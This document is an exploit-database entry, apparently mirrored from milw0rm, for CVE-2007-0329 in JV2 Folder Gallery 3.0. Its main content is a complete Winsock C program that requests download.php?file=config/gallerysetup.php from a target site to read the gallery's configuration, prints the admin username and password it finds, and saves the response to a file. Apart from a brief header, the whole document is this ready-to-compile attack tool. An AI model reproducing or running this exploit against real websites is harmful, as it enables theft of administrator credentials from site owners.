Exploit JV2 Folder Gallery 3.0 - 'download.php' Remote File Disclosure

[Exploiter]

EDB-ID

3125

Проверка EDB

1. Пройдено

Автор

PETRO

Тип уязвимости

WEBAPPS

Платформа

PHP

CVE

cve-2007-0329

Дата публикации

2007-01-14

/*
Script Name  :JV2 Folder Gallery
Script site  :www.jv2.net

Discovered by    :SaO 
Exploit Coded by :PeTrO 
Credits To soulreaver,Kuz3y

Compile: Visual C++ or DevC++ 
         

*/

#include <stdio.h>
#include <string.h>
#include <winsock.h>
#pragma comment(lib,"ws2_32.lib")

int main(int argc, char *argv[])
{

char gelenveri[1000];
char sendCommand[1000];
int i=0,sayac=0;

WSADATA wsdata;
SOCKET s;
struct hostent *hn;
struct sockaddr_in karsi_addr;
WSAStartup(MAKEWORD(2,0),&wsdata);



if(argc!=3)
{ 
     printf("\t**************************************************************\n"
            "\t*                                                            *\n"
            "\t*                   JV2 Folder Gallery                       *\n"                         
            "\t*        Remote Admin uName and Pass. Exploit by PeTrO       *\n"
            "\t*                                                            *\n"
            "\t*    Usage:exploit targetSite [GalleryPath]                  *\n"
            "\t*    Example:exploit localhost /gallery/                     *\n"
            "\t*                                                            *\n"
            "\t*    Discovered by    :SaO                                   *\n"
            "\t*    Exploit Coded by :PeTrO                                 *\n"
            "\t**************************************************************\n");
     
     exit(1);
}else{
      hn=gethostbyname(argv[1]);
     }

strcpy(sendCommand,"GET ");
strcat(sendCommand,argv[2]);
strcat(sendCommand,"download.php?file=config/gallerysetup.php \n\n");


printf("\n[+]Connecting....");
karsi_addr.sin_family = AF_INET;
karsi_addr.sin_port = htons(80);
karsi_addr.sin_addr =*((struct in_addr *)hn->h_addr);
memset(&(karsi_addr.sin_zero),'\0', 8);
if((s=socket(AF_INET, SOCK_STREAM, 0))==-1 ) //create a socket
{
    printf("\n[-]Socket Error");
    exit(-1);
}

if((connect(s,(struct sockaddr *)&karsi_addr,sizeof(struct sockaddr)))==-1)//connect server
{
    printf("\n[-]Connecting Error");
    exit(-1);
}

printf("\n[+]Sending command\n");
if((send(s,sendCommand,strlen(sendCommand),0))==-1)
{
    printf("\n[-]Sending Error");
    exit(-1);
}

if((recv(s,gelenveri,1000,0))==-1)
{
     printf("\n[-]Receive Error");
     exit(-1);
}

FILE *fp;

fp=fopen("data.txt","w");

for(i=0;sayac!=2;i++)
{
   if(gelenveri[i]==59) sayac++;
   
   printf("%c",gelenveri[i]);
}   
   
fprintf(fp,"%s",gelenveri);
   
WSACleanup();
return 0;
}

// milw0rm.com [2007-01-14]